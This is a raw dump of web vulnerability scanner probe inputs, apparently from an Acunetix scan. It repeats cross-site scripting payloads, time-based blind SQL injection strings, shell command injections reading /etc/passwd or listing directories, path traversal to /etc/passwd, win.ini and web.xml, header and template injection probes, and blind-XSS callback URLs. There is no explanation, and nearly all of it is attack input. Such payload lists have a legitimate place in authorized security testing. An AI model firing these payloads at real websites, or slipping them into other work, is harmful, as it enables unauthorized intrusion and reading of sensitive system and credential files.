1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961272)>

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(901905)>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1<img/src=">" onerror=alert(925053)>

if(now()=sysdate(),sleep(9.888),0)/*'XOR(if(now()=sysdate(),sleep(9.888),0))OR'"XOR(if(now()=sysdate(),sleep(9.888),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

${99240+99452}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1<ScRiPt%20>prompt(903430)</sCripT>

1

(select(0)from(select(sleep(9.888)))v)/*'+(select(0)from(select(sleep(9.888)))v)+'"+(select(0)from(select(sleep(9.888)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1&lt

`cat /etc/passwd`

1some_inexistent_file_with_long_name%00.jpg

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n936775=v921984

\xf6<img acu onmouseover=prompt(910264) //\xf6>

)

|cat /etc/passwd#

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(935656)>

1

1

!(()&&!|*|*|

testasp.vulnweb.com

'"()

'|'ld

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

1

1

"|"ld

saJE9Qbd'

/etc/passwd

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

IpP8FgzE')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1_W3RJN <ScRiPt >prompt(952232)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

dcMqvMnn'))

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

acunetix_wvs_invalid_filename

1

http://hitYNigHyx2yv.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

"

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

1

1

1

1

comments

||cat /etc/passwd

1

file:///etc/passwd

1

-1))

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(978293)</ScRiPt>

'"

1

comments/.

&dir

/\../\../\../\../\../\../\../etc/passwd

Pv02g42T'

1

'"()&%<ScRiPt >prompt(975360)</ScRiPt>

1

<!--

1

1

1

'&dir&'

FoFIYA4p')

WEB-INF/web.xml

1_983047

1

1

1

1

WEB-INF\web.xml

KUVdXu7F'))

"&dir&"

1

1

1

|dir

1

1

../../../../../../../../../../windows/win.ini

acu7643\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7643

1

acux1608\xc0\xbez1\xc0\xbcz2a\x90bcxuca1608

1

'|dir

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(904494)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

"|dir

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(900329)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974611)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925179></ScRiPt>

1

1<ScRiPt >prompt(907976)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(972626)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928851)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(920519))>

1

1

1

1<iframe src='data:text/html

1

1

1

response.write(9713952*9224991)

WEB-INF/web.xml

1<body onload=prompt(907185)>

&cat /etc/passwd&

1

1

1

'+response.write(9713952*9224991)+'

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985182)>

WEB-INF\web.xml

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

"+response.write(9713952*9224991)+"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965207)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(927160)>

1<ScRiPt%20>prompt(949451)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6.218),0)/*'XOR(if(now()=sysdate(),sleep(6.218),0))OR'"XOR(if(now()=sysdate(),sleep(6.218),0))OR"*/

1

1

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99411+99660}

(select(0)from(select(sleep(6.218)))v)/*'+(select(0)from(select(sleep(6.218)))v)+'"+(select(0)from(select(sleep(6.218)))v)+"*/

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(925360) //\xf6>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

|cat /etc/passwd#

1

1

)

1<input autofocus onfocus=prompt(935234)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n944458=v943791

1some_inexistent_file_with_long_name%00.jpg

-1)

1

'|'ld

1

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

Ug9Wvj1W'

testasp.vulnweb.com

1

1

1

1

1_ENEit <ScRiPt >prompt(991000)</ScRiPt>

'

1ERDaWSb')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

muiF6Vm2'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

http://hitKHvJ2hUWtV.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

comments

&dir

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1))

1

1

'&dir&'

comments

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

ZRS6fjZq'

1

1'"()&%<ScRiPt >prompt(912169)</ScRiPt>

"&dir&"

1

comments/.

<!--

1

aoqaGjnR')

WEB-INF/web.xml

1

1

|dir

'"()&%<ScRiPt >prompt(925377)</ScRiPt>

1

u3Nb7FuH'))

1

1

'|dir

1

WEB-INF\web.xml

1_992068

1

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu3622\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3622

1

../../../../../../../../../../windows/win.ini.jpg

acux7541\xc0\xbez1\xc0\xbcz2a\x90bcxuca7541

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(970214)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(989504)</script>

1

1

1<ScRiPt >prompt(975395)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993339></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(980308)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9600492*9304093)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(931801)">

1

'+response.write(9600492*9304093)+'

1

1

1

"+response.write(9600492*9304093)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937310)"></g></svg>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(936108))>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

1<body onload=prompt(938764)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

`cat /etc/passwd`

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969905)>

-1

${99002+99117}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(993956)>

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n984967=v970821

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(984830)>

'|'ld

)

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(932787)</sCripT>

1

!(()&&!|*|*|

Vs4UjChh'

"|"ld

/etc/passwd

1

testasp.vulnweb.com

'"()

1

1&lt

^(#$!@#$)(()))******

kjczHgQN')

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

WbkZIUz5'))

'

\xf6<img acu onmouseover=prompt(942840) //\xf6>

1

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

1<input autofocus onfocus=prompt(901866)>

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hit1yDwwZRjTl.bxss.me/

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

1

&dir

6rjrnn4n'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

1

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

'&dir&'

file:///etc/passwd

LT7Rl9LJ')

1

1

comments/.

'"

1

1'"()&%<ScRiPt >prompt(933214)</ScRiPt>

"&dir&"

7rYmMhzn'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

<!--

1

1_dlK55 <ScRiPt >prompt(963402)</ScRiPt>

1

'"()&%<ScRiPt >prompt(981956)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

1_940622

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

acu10357\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10357

1

1

1

../../../../../../../../../../boot.ini

1

1

acux4613\xc0\xbez1\xc0\xbcz2a\x90bcxuca4613

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(911816)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(985223)</script>

1

1

1

1<ScRiPt >prompt(994601)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972575></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(924506)</ScRiPt>

1

1<video><source onerror="javascript:prompt(913156)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911742)"></g></svg>

1

1

1

1<div style=width:expression(prompt(966967))>

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

response.write(9996238*9277920)

1<iframe src='data:text/html

1

1

1

&cat /etc/passwd&

'+response.write(9996238*9277920)+'

1<body onload=prompt(938284)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9996238*9277920)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941489)>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(929704)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img/src=">" onerror=alert(966075)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

${100313+99880}

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(900551)</sCripT>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n928129=v946775

1

1

1&lt

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(987187) //\xf6>

)

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(938103)>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

1

Qsn6qSX9'

'"()

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

1

'

HVOr7eE1')

1

[url=http://www.acunetix.com]website security[/url]

1

Q2nwwggz'))

1

1

/etc/passwd

"

1

1

1

1_Oyv5T <ScRiPt >prompt(945911)</ScRiPt>

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}\

"

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitmHXhfPkcuw.bxss.me/

-1))

1

||cat /etc/passwd

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

tG34sqrL'

1

1

1

&dir

1

comments

http://www.acunetix.tst

1

gUetOl9X')

1

file:///etc/passwd

1

'&dir&'

'"

1'"()&%<ScRiPt >prompt(912140)</ScRiPt>

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

QyqpUty4'))

1

1

"&dir&"

<!--

'"()&%<ScRiPt >prompt(922222)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1_939027

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

acu7855\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7855

1

1

1

../../../../../../../../../../boot.ini

1

acux4789\xc0\xbez1\xc0\xbcz2a\x90bcxuca4789

1

1<ScRiPt >prompt(967285)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(937626)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(927124)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981639></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(976723)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(952753)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957206)"></g></svg>

1

1

1<div style=width:expression(prompt(961088))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

response.write(9673317*9800503)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9673317*9800503)+'

1<body onload=prompt(930447)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9673317*9800503)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997591)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<img src=xyz OnErRor=prompt(918354)>

1

if(now()=sysdate(),sleep(6.374),0)/*'XOR(if(now()=sysdate(),sleep(6.374),0))OR'"XOR(if(now()=sysdate(),sleep(6.374),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(966856)>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6.374)))v)/*'+(select(0)from(select(sleep(6.374)))v)+'"+(select(0)from(select(sleep(6.374)))v)+"*/

1

1

${99515+100494}

1

1

1<ScRiPt%20>prompt(947281)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1

1&lt

1&n997690=v947323

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(977988) //\xf6>

)

1

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<input autofocus onfocus=prompt(936707)>

!(()&&!|*|*|

6ITDhGTP'

1

/etc/passwd

testasp.vulnweb.com

'

1

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

iAqXlr4n')

"

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

HN0bbHMD'))

1

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_fTAcX <ScRiPt >prompt(902690)</ScRiPt>

-1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

1

1

http://hitP0eVHIJVBd.bxss.me/

&dir

comments

1

1

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

comments

1

-1))

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

-1))

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

-1))

1

comments

mLYtxF0y'

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

ZaVv1VUm'

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

fj2M55wU')

http://www.acunetix.tst

KGNcZNmt')

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

iBhQwaIW'))

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

YFPea6yl'))

wqTYW9ps'))

1

1

file:///etc/passwd

1

1

1

"&dir&"

comments/.

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(950039)</ScRiPt>

|dir

1

1

1

'"()&%<ScRiPt >prompt(973011)</ScRiPt>

<!--

1

WEB-INF/web.xml

1

1

'|dir

1

1

1_979786

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu8588\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8588

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4384\xc0\xbez1\xc0\xbcz2a\x90bcxuca4384

1

1

1

1<ScRiPt >prompt(976450)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(942074)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(989029)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977066></ScRiPt>

1

1

1<ScRiPt >prompt(989756)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(974295)">

1

response.write(9317218*9649019)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969467)"></g></svg>

'+response.write(9317218*9649019)+'

1

&cat /etc/passwd&

1

1<div style=width:expression(prompt(994048))>

1

"+response.write(9317218*9649019)+"

WEB-INF/web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<body onload=prompt(986029)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952269)>

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img src=xyz OnErRor=prompt(965594)>

${99568+100029}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

-1))

1

1

1<img/src=">" onerror=alert(915210)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

VagBUfpN'

1&n946397=v996686

1

1<ScRiPt%20>prompt(950722)</sCripT>

)

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

MM1ZL0Pk')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'"()

1&lt

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

7LFun2fX'))

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(994365) //\xf6>

testasp.vulnweb.com

1

'

-1

1

1

1<input autofocus onfocus=prompt(904161)>

1

/etc/passwd

'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

FUVVSeYZ'

1

1

&dir

1_bGIlU <ScRiPt >prompt(901472)</ScRiPt>

http://hitX9Naknng1y.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

v2xdCgVI')

'&dir&'

comments

1

1

1

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

HoqUXzYF'))

"&dir&"

1

'"

http://www.acunetix.tst

1

file:///etc/passwd

1

1

comments/.

1

<!--

1

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(939678)</ScRiPt>

1

1

1

'|dir

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(987259)</ScRiPt>

1

1

1

1

"|dir

1

1_980260

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu10069\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10069

../../../../../../../../../../boot.ini

1

1

